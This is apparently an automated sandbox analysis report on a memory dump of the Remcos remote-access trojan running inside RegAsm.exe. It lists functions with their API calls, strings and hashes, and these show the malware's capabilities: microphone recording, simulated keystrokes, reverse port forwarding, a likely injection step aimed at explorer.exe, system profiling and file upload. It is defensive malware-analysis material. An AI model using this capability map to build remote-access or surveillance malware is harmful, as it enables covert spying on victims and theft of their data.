                    • Opcode Fuzzy Hash: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                    • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                    Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                    • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                    • CloseHandle.KERNEL32(00000000), ref: 0041345F
                    • CloseHandle.KERNEL32(?), ref: 00413465
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                    • String ID:
                    • API String ID: 297527592-0
                    • Opcode ID: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
                    • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                    • Opcode Fuzzy Hash: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
                    • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                    Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                    Download Yara Rule
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                    • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                    • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                    • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                    Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 00448135
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00448141
                    • _free.LIBCMT ref: 0044814C
                    • _free.LIBCMT ref: 00448157
                    • _free.LIBCMT ref: 00448162
                    • _free.LIBCMT ref: 0044816D
                    • _free.LIBCMT ref: 00448178
                    • _free.LIBCMT ref: 00448183
                    • _free.LIBCMT ref: 0044818E
                    • _free.LIBCMT ref: 0044819C
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                    • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                    • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                    • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                    Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Eventinet_ntoa
                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                    • API String ID: 3578746661-3604713145
                    • Opcode ID: f9a27c71ff67ba9158015f4eae185af36ec3b7274dd4ef4f0beb13a76f4cc4c0
                    • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                    • Opcode Fuzzy Hash: f9a27c71ff67ba9158015f4eae185af36ec3b7274dd4ef4f0beb13a76f4cc4c0
                    • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                    Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                    • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                    • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                    • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                    Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                    Download Yara Rule
                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                    • Sleep.KERNEL32(00000064), ref: 00417521
                    • DeleteFileW.KERNEL32(00000000), ref: 00417555
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreateDeleteExecuteShellSleep
                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                    • API String ID: 1462127192-2001430897
                    • Opcode ID: ec50ac54269d49d44067edab70f48f9f458cf939bf05b3af8c0101079797eb99
                    • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                    • Opcode Fuzzy Hash: ec50ac54269d49d44067edab70f48f9f458cf939bf05b3af8c0101079797eb99
                    • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                    Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                    • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentProcess
                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                    • API String ID: 2050909247-4242073005
                    • Opcode ID: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                    • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                    • Opcode Fuzzy Hash: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                    • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                    Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                    Download Yara Rule
                    APIs
                    • _strftime.LIBCMT ref: 00401D50
                      • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                    • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                    • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                    • API String ID: 3809562944-243156785
                    • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                    • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                    • Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                    • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                    Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                    Download Yara Rule
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                    • int.LIBCPMT ref: 00410E81
                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                    • std::_Facet_Register.LIBCPMT ref: 00410EC1
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                    • __Init_thread_footer.LIBCMT ref: 00410F29
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                    • String ID: ,kG$0kG
                    • API String ID: 3815856325-2015055088
                    • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                    • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                    • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                    • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                    Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                    Download Yara Rule
                    APIs
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                    • waveInStart.WINMM ref: 00401CFE
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                    • String ID: dMG$|MG$PG
                    • API String ID: 1356121797-532278878
                    • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                    • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                    • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                    • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                    Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                      • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                      • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                      • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                    • TranslateMessage.USER32(?), ref: 0041D4E9
                    • DispatchMessageA.USER32 ref: 0041D4F3
                    • GetMessageA.USER32 ref: 0041D500
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                    • String ID: Remcos
                    • API String ID: 1970332568-165870891
                    • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                    • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                    • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                    • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                    Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                    • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                    • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                    • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                    Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • _memcmp.LIBVCRUNTIME ref: 00445423
                    • _free.LIBCMT ref: 00445494
                    • _free.LIBCMT ref: 004454AD
                    • _free.LIBCMT ref: 004454DF
                    • _free.LIBCMT ref: 004454E8
                    • _free.LIBCMT ref: 004454F4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorLast$_abort_memcmp
                    • String ID: C
                    • API String ID: 1679612858-1037565863
                    • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                    • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                    • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                    • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                    Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: tcp$udp
                    • API String ID: 0-3725065008
                    • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                    • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                    • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                    • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                    Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                    Download Yara Rule
                    APIs
                    • __Init_thread_footer.LIBCMT ref: 004018BE
                    • ExitThread.KERNEL32 ref: 004018F6
                    • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                    • String ID: PkG$XMG$NG$NG
                    • API String ID: 1649129571-3151166067
                    • Opcode ID: d792f27428e216ec403bd2c8f2a7274a29a7ee60ee52af981f0ff1553ee06993
                    • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                    • Opcode Fuzzy Hash: d792f27428e216ec403bd2c8f2a7274a29a7ee60ee52af981f0ff1553ee06993
                    • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                    Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • CloseHandle.KERNEL32(00000000), ref: 00407A4D
                    • MoveFileW.KERNEL32 ref: 00407A6A
                    • CloseHandle.KERNEL32(00000000), ref: 00407A95
                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                      • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                    • String ID: .part
                    • API String ID: 1303771098-3499674018
                    • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                    • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                    • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                    • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                    Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
                    • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
                    • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
                    • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
                    • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
                    • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
                    • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
                    • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: InputSend
                    • String ID:
                    • API String ID: 3431551938-0
                    • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                    • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                    • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                    • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                    Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16_free
                    • String ID: a/p$am/pm$zD
                    • API String ID: 2936374016-2723203690
                    • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                    • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                    • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                    • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                    Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Enum$InfoQueryValue
                    • String ID: [regsplt]$xUG$TG
                    • API String ID: 3554306468-1165877943
                    • Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                    • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                    • Opcode Fuzzy Hash: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                    • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                    Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetConsoleCP.KERNEL32 ref: 0044B3FE
                    • __fassign.LIBCMT ref: 0044B479
                    • __fassign.LIBCMT ref: 0044B494
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
                    • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                    • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                    • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                    • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                    Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: D[E$D[E
                    • API String ID: 269201875-3695742444
                    • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                    • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                    • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                    • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                    Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                      • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
